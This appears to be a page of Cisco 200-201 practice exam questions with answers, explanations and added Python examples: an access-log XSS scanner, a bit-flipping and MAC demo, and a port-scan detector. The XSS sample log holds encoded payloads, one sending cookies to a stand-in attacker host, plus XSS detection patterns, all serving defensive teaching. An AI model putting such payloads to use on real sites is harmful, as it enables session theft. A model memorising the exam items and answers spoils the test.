Cisco 200-201 Practice Test - Questions Answers, Page 21

Refer to the exhibit.

What is occurring?

A. Cross-Site Scripting attack
B. XML External Entities attack
C. Insecure Deserialization
D. Regular GET requests

Suggested answer: A

Explanation:

The exhibit shows a log of HTTP GET requests, one of which carries a suspicious string in the requested URL that is characteristic of a Cross-Site Scripting (XSS) attack. XSS involves injecting script into a page that is then rendered by other users' browsers; the injected script can steal session cookies or other data, redirect the victim to an attacker-controlled site, or perform actions in the victim's name without consent. The other options do not match what the log shows: an XXE attack is carried in an XML request body whose DOCTYPE declares an external entity, insecure deserialization involves a serialized object handed to the application, and ordinary GET requests do not carry script fragments in their parameters. Attackers commonly URL-encode or double-encode the payload, so a request should be decoded before it is judged benign. Reference: Cisco Cybersecurity Operations Fundamentals, Module 1: Security Concepts, Lesson 1.3: Common Network Application Operations and Attacks, Topic 1.3.2: Web Application Attacks
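The detection described above, as an added example that is not part of the ExamGecko page or Cisco's material: a small Python scanner that parses Common Log Format access-log lines, decodes each GET query parameter (repeatedly, to defeat double encoding) and flags the parameters that carry XSS indicators. The log lines, the hosts and the payloads are constructed for the example; the real exhibit is not reproduced here.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed web-server access log lines (Common Log Format). They are illustrative
# only and are not the exhibit from the practice test. Lines 3 and 4 carry reflected
# XSS payloads in URL-encoded query parameters.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1043
10.0.0.5 - - [12/Mar/2024:10:01:05 +0000] "GET /search?q=routers HTTP/1.1" 200 2210
10.0.0.9 - - [12/Mar/2024:10:02:11 +0000] "GET /search?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 2301
10.0.0.9 - - [12/Mar/2024:10:02:15 +0000] "GET /profile?name=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 512
10.0.0.7 - - [12/Mar/2024:10:03:00 +0000] "GET /about HTTP/1.1" 200 890
"""

# Common Log Format: client, identity, user, [timestamp], "METHOD URL VERSION", status, size.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators that a decoded parameter value is trying to inject script into the page.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),                                               # <script>...
    re.compile(r"<\s*(img|svg|iframe|body|object|embed)\b[^>]*\bon\w+\s*=", re.I),   # <img onerror=...>
    re.compile(r"\bjavascript\s*:", re.I),                                           # href="javascript:..."
    re.compile(r"\bon(error|load|mouseover|focus|click)\s*=", re.I),                 # bare event handlers
]


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly; attackers double-encode payloads to slip past naive filters."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss(url):
    """Return (param, decoded_value, rule) for each query parameter that matches an XSS rule."""
    hits = []
    query = urlsplit(url).query
    for name, raw in parse_qsl(query, keep_blank_values=True):  # parse_qsl decodes once
        decoded = decode_fully(raw)
        for pattern in XSS_PATTERNS:
            if pattern.search(decoded):
                hits.append((name, decoded, pattern.pattern))
                break
    return hits


def scan_log(text):
    """Parse CLF lines and return one alert per request parameter carrying an XSS indicator."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, payload, rule in find_xss(m["url"]):
            alerts.append({"src": m["src"], "ts": m["ts"], "param": param,
                           "payload": payload, "rule": rule})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['ts']} {a['src']} param={a['param']} payload={a['payload']!r}")
```

The pattern list is deliberately short; in practice it is the decoding step that matters most, because a filter that inspects the raw URL sees only `%3Cscript%3E` and never matches.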

What is a collection of compromised machines that attackers use to carry out a DDoS attack?

A. subnet
B. botnet
C. VLAN
D. command and control

Suggested answer: B

Explanation:

A botnet is a network of compromised computers (bots) controlled by an attacker. Botnets are often used to carry out Distributed Denial of Service (DDoS) attacks, in which the bots are directed to flood a target with traffic until it becomes inaccessible. Option D is the infrastructure the attacker uses to issue instructions to the bots, not the collection of machines itself; a subnet and a VLAN are ordinary network segmentation constructs. Reference: Cisco Cybersecurity Operations Fundamentals, Module 1: Security Concepts, Lesson 1.3: Common Network Application Operations and Attacks, Topic 1.3.4: Denial-of-Service Attacks

Which type of access control depends on the job function of the user?

A. discretionary access control
B. nondiscretionary access control
C. role-based access control
D. rule-based access control

Suggested answer: C

Explanation:

Role-Based Access Control (RBAC) restricts system access to authorized users based on the roles they hold within an organization, and roles are defined by job function, authority and responsibility. Assigning permissions to roles rather than to individuals reduces administrative work and makes least privilege easier to maintain, since a user gains or loses permissions by changing role. RBAC is one form of nondiscretionary access control, but option B names the broader category rather than the model tied to job function; discretionary access control lets the resource owner decide who has access, and rule-based access control applies fixed rules (such as time of day or source address) regardless of who the user is. Reference: Cisco Cybersecurity Operations Fundamentals, Module 1: Security Concepts, Lesson 1.2: Data Protection, Topic 1.2.2: Access Control Models

The security team has detected an ongoing spam campaign targeting the organization. The team's approach is to push back the cyber kill chain and mitigate ongoing incidents. At which phase of the cyber kill chain should the security team mitigate this type of attack?

A. actions
B. delivery
C. reconnaissance
D. installation

Suggested answer: B

Explanation:

In the cyber kill chain model, a spam or phishing campaign is the ''delivery'' phase: the attacker transmits the weaponized payload (a malicious attachment or link) to the target via email or another channel. Controls that act at this phase, such as email filtering and URL blocking, stop the message before exploitation and installation can take place. Reconnaissance has already occurred by the time mail is arriving, and actions on objectives is the final phase, so neither is where an ongoing campaign is mitigated. Reference: Cisco Cybersecurity Operations Fundamentals, Module 1: Security Concepts, Lesson 1.4: Security Monitoring, Topic 1.4.2: The Cyber Kill Chain Model

What describes the defense-in-depth principle?

A. defining precise guidelines for new workstation installations
B. categorizing critical assets within the organization
C. isolating guest Wi-Fi from the local network
D. implementing alerts for unexpected asset malfunctions

Suggested answer: D

Explanation:

The defense-in-depth principle applies multiple, overlapping layers of security controls to protect an asset, on the assumption that no single control prevents every attack; each additional layer reduces the chance that the failure of one control leads to a compromise. Implementing alerts for unexpected asset malfunctions is such a layer: a detective control that catches what the preventive layers missed, since an unexplained malfunction can be the first sign of a breach or incident. Reference: Cisco Cybersecurity Operations Fundamentals, Module 1: Security Concepts, Lesson 1.1: The CIA Triad and Security Concepts, Topic 1.1.4: Defense-in-Depth Principle

Refer to the exhibit.

A workstation downloads a malicious .docx file from the Internet and a copy is sent to FTDv. The FTDv sends the file hash to FMC and the file event is recorded. What would have occurred with stronger data visibility?

A. The traffic would have been monitored at any segment in the network.
B. Malicious traffic would have been blocked on multiple devices.
C. An extra level of security would have been in place.
D. Detailed information about the data in real time would have been provided.

Suggested answer: D

Explanation:

Stronger data visibility means detailed information about the data is available in real time: not only a file hash and an event recorded after the fact, but the details of the file, the host that downloaded it and the connection that carried it, as they occur. That visibility lets analysts examine the traffic more completely and identify and contain threats sooner. Options A, B and C describe monitoring coverage, blocking and additional controls; none of them is the same thing as visibility into the data itself. Reference: Cisco Cybersecurity Operations Fundamentals

What is the impact of encryption?

A. Confidentiality of the data is kept secure and permissions are validated
B. Data is accessible and available to permitted individuals
C. Data is unaltered and its integrity is preserved
D. Data is secure and unreadable without decrypting it

Suggested answer: D

Explanation:

Encryption renders data unreadable to anyone who does not hold the decryption key, which is why it is the primary control for confidentiality, particularly when sensitive information is transmitted over untrusted networks. It does not by itself validate permissions (A), guarantee availability (B) or preserve integrity (C): ciphertext can still be deleted, and with many cipher modes it can be modified without the change being detected, so integrity requires a separate mechanism such as a MAC or an authenticated-encryption mode.
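The distinction between confidentiality and integrity, as an added example that is not part of the ExamGecko page or Cisco's material. It uses a toy stream cipher built from HMAC-SHA256 in counter mode (an assumption made so the example needs only the Python standard library; it is not a recommended cipher) to show that encrypted data is unreadable and recoverable only with the key, that an attacker can nevertheless alter the plaintext by flipping ciphertext bits without the key, and that an encrypt-then-MAC construction detects that alteration. Keys, nonce and message are generated or constructed inside the block.

```python
import hashlib
import hmac
import os

# Toy stream cipher: HMAC-SHA256 in counter mode as the keystream generator. It is used
# here only to show the properties of encryption with the standard library; production
# code should use a vetted AEAD such as AES-GCM or ChaCha20-Poly1305.


def keystream(key, nonce, length):
    """Derive `length` pseudorandom bytes from key and nonce (assumption: nonce never reused)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(key, nonce, plaintext):
    """Confidentiality only: XOR the plaintext with the keystream."""
    ks = keystream(key, nonce, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


decrypt = encrypt  # XOR is its own inverse


def tamper(ciphertext, offset, known, replacement):
    """Bit-flipping attack: an adversary who knows the plaintext bytes at `offset` can turn
    them into `replacement` by XORing the ciphertext, without the key and without reading
    anything else. This is why encryption alone does not preserve integrity."""
    if len(known) != len(replacement):
        raise ValueError("known and replacement must have the same length")
    ct = bytearray(ciphertext)
    for i, (k, r) in enumerate(zip(known, replacement)):
        ct[offset + i] ^= k ^ r
    return bytes(ct)


def seal(enc_key, mac_key, nonce, plaintext):
    """Encrypt-then-MAC: authenticate nonce and ciphertext so alterations are detected."""
    ct = encrypt(enc_key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return ct, tag


def open_sealed(enc_key, mac_key, nonce, ct, tag):
    """Verify the tag (constant-time) before decrypting; return None if the data was altered."""
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return decrypt(enc_key, nonce, ct)


def demo():
    """Walk through the properties the question contrasts and report which ones hold."""
    enc_key, mac_key, nonce = os.urandom(32), os.urandom(32), os.urandom(16)
    msg = b"TRANSFER 0100 USD TO ACCT 4242"  # constructed message
    ct = encrypt(enc_key, nonce, msg)
    at = msg.index(b"0100")
    forged = decrypt(enc_key, nonce, tamper(ct, at, b"0100", b"9900"))
    sealed_ct, tag = seal(enc_key, mac_key, nonce, msg)
    tampered = open_sealed(enc_key, mac_key, nonce, tamper(sealed_ct, at, b"0100", b"9900"), tag)
    return {
        "unreadable": msg not in ct,                 # confidentiality: plaintext not visible
        "round_trip": decrypt(enc_key, nonce, ct),   # readable again only with the key
        "forged": forged,                            # integrity NOT preserved by encryption alone
        "tamper_detected": tampered is None,         # integrity restored by the MAC
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The forged message decrypts cleanly to a different amount, which is exactly the failure mode option C glosses over; only the MAC check in `open_sealed` turns the alteration into a rejected message.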

An engineer is analyzing a recent breach in which confidential documents were altered and stolen by the receptionist. Further analysis shows that the threat actor connected an external USB device to bypass security restrictions and steal data. The engineer could not find the external USB device. Which piece of information must the engineer use for attribution in the investigation?

A. list of security restrictions and privilege boundaries bypassed
B. external USB device
C. receptionist and the actions performed
D. stolen data and its criticality assessment

Suggested answer: C

Explanation:

Attribution means identifying who was responsible for an incident. The physical USB device would have been useful evidence, but it was not recovered, so attribution rests on the person already identified (the receptionist) and the record of the actions they performed, for example authentication events, file-access audit records and device-connection logs on the workstation. The restrictions that were bypassed and the criticality of the stolen data describe the gaps exploited and the impact, not who carried out the breach.

Refer to the exhibit.

During the analysis of a suspicious scanning activity incident, an analyst discovered multiple local TCP connection events. Which technology provided these logs?

A. antivirus
B. proxy
C. IDS/IPS
D. firewall

Suggested answer: D

Explanation:

Logs that record individual TCP connection events (source and destination address and port, and whether the connection was allowed or denied) come from a firewall, which monitors and controls traffic according to its rule set and writes an entry for each matched connection. A burst of connection attempts from one source to many ports on one host is how a port scan appears in such logs, whether the attempts were permitted or denied. An IDS/IPS logs signature or anomaly alerts rather than every connection, a proxy logs application-layer requests such as URLs, and antivirus logs file and process detections on a host. Reference: Cisco Cybersecurity Operations Fundamentals
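How the scanning activity would be picked out of such connection logs, as an added example that is not part of the ExamGecko page or Cisco's material. The block parses constructed, simplified firewall log lines in the style of iptables/UFW LOG entries (the exhibit itself is not reproduced) and flags any source that touches many distinct destination ports on one host within a short sliding window, counting blocked and allowed attempts alike. Hosts, ports, timestamps and the detection thresholds are all assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed, simplified firewall log lines in the style of iptables/UFW LOG entries.
# They are not the exhibit from the practice test. 10.0.0.9 probes ten ports on
# 10.0.0.20 within five seconds; the other hosts make ordinary connections.
SAMPLE_LOG = """\
Mar 12 10:02:01 fw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=40001 DPT=21 SYN
Mar 12 10:02:01 fw kernel: [UFW ALLOW] IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=40002 DPT=22 SYN
Mar 12 10:02:02 fw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=40003 DPT=23 SYN
Mar 12 10:02:02 fw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=40004 DPT=25 SYN
Mar 12 10:02:03 fw kernel: [UFW ALLOW] IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=40005 DPT=80 SYN
Mar 12 10:02:03 fw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=40006 DPT=110 SYN
Mar 12 10:02:04 fw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=40007 DPT=135 SYN
Mar 12 10:02:04 fw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=40008 DPT=139 SYN
Mar 12 10:02:05 fw kernel: [UFW ALLOW] IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=40009 DPT=443 SYN
Mar 12 10:02:05 fw kernel: [UFW BLOCK] IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.20 PROTO=TCP SPT=40010 DPT=445 SYN
Mar 12 10:02:01 fw kernel: [UFW ALLOW] IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=51001 DPT=443 SYN
Mar 12 10:02:03 fw kernel: [UFW ALLOW] IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=51002 DPT=443 SYN
Mar 12 10:02:06 fw kernel: [UFW ALLOW] IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.20 PROTO=TCP SPT=51003 DPT=443 SYN
Mar 12 10:02:07 fw kernel: [UFW ALLOW] IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.20 PROTO=TCP SPT=52001 DPT=22 SYN
Mar 12 10:02:08 fw kernel: [UFW ALLOW] IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.20 PROTO=UDP SPT=52002 DPT=53
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) .*?\[UFW (?P<action>\w+)\].*?"
    r" SRC=(?P<src>\S+) DST=(?P<dst>\S+).*? PROTO=(?P<proto>\w+) SPT=\d+ DPT=(?P<dpt>\d+)"
)


def parse(text):
    """Return (timestamp, src, dst, dst_port, action) for each TCP connection event."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m or m["proto"] != "TCP":
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog has no year; deltas still work
        events.append((ts, m["src"], m["dst"], int(m["dpt"]), m["action"]))
    return events


def detect_port_scans(events, window_seconds=10, min_ports=8):
    """Flag each (src, dst) pair that touches at least min_ports distinct destination ports
    within some window_seconds-long span. Blocked and allowed attempts both count, because
    a scan probes closed and open ports alike. Reports the widest qualifying window per pair."""
    by_pair = defaultdict(list)
    for ts, src, dst, dpt, _action in sorted(events):
        by_pair[(src, dst)].append((ts, dpt))
    alerts = []
    for (src, dst), hits in by_pair.items():
        best = None
        start = 0
        for end in range(len(hits)):
            while (hits[end][0] - hits[start][0]).total_seconds() > window_seconds:
                start += 1
            ports = {p for _, p in hits[start:end + 1]}
            if len(ports) >= min_ports and (best is None or len(ports) > len(best["ports"])):
                best = {"src": src, "dst": dst, "ports": sorted(ports),
                        "first": hits[start][0], "last": hits[end][0]}
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_port_scans(parse(SAMPLE_LOG)):
        print(f"{a['src']} -> {a['dst']} scanned {len(a['ports'])} ports "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}: {a['ports']}")
```

The thresholds are the tuning knobs: a vulnerability scanner or a monitoring host will legitimately exceed them, so in a SOC the same logic is usually paired with an allow-list of known scanners rather than lowered until it stops firing.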

Refer to the exhibit.

An analyst was given a PCAP file associated with a recent intrusion event on the company FTP server. Which display filter should the analyst use to filter the FTP traffic?

A. dstport == FTP
B. tcp.port==21
C. tcpport = FTP
D. dstport = 21

Suggested answer: B

Explanation:

The correct Wireshark display filter is ''tcp.port==21'': it matches every TCP packet whose source or destination port is 21, the standard port for the FTP control channel, so both directions of the session are shown. The other options are not valid display-filter syntax: the field is named tcp.port (or tcp.srcport and tcp.dstport), not dstport or tcpport, and a single ''='' is not the equality operator (Wireshark uses == or eq). Two practical caveats: tcp.dstport==21 would show only the client-to-server half of the conversation, and the FTP data channel runs over a separate connection (port 20 in active mode, a negotiated ephemeral port in passive mode), so a filter such as ''ftp || ftp-data'' is needed to see the transferred files as well as the commands.

Total 331 questions